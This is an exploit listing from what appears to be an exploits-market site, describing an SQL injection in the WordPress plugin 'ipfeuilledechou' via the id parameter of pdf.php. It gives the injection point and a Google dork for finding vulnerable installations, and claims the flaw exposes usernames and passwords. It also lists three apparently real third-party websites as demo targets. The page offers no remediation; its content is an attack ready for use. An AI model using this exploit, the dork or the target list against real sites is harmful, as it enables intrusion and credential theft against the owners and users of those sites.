[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress plugin ipfeuilledechou SQL Injection Vulnerability

Author
Zikou-16
Risk
[
Security Risk High
]
0day-ID
0day-ID-20206
Category
web applications
Date add
20-01-2013
Platform
php
-------------------------------------------------------------------
Wordpress plugins - ipfeuilledechou SQL Injection Vulnerability 
-------------------------------------------------------------------
 
#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"/wp-content/plugins/ipfeuilledechou/"
# Tested on : Windows 7 , Backtrack 5r3
####
 
#=> Exploit Info :
------------------
# The attacker can access to the database & get username & password
------------------

#=> SQL Injection 

http://[target]/[path]wp-content/plugins/ipfeuilledechou/pdf.php?id=25'[inj3ct h3re]

------------------------------

#=> Demos :
 
http://www.ps76.fr/wp-content/plugins/ipfeuilledechou/pdf.php?id=25

http://christophebouillon.fr/wp-content/plugins/ipfeuilledechou/pdf.php?id=13

http://www.nicolasrouly.fr/wp-content/plugins/ipfeuilledechou/pdf.php?id=32

------------------------------ <= Th3 End ^_^'

#  0day.today [2024-12-24]  #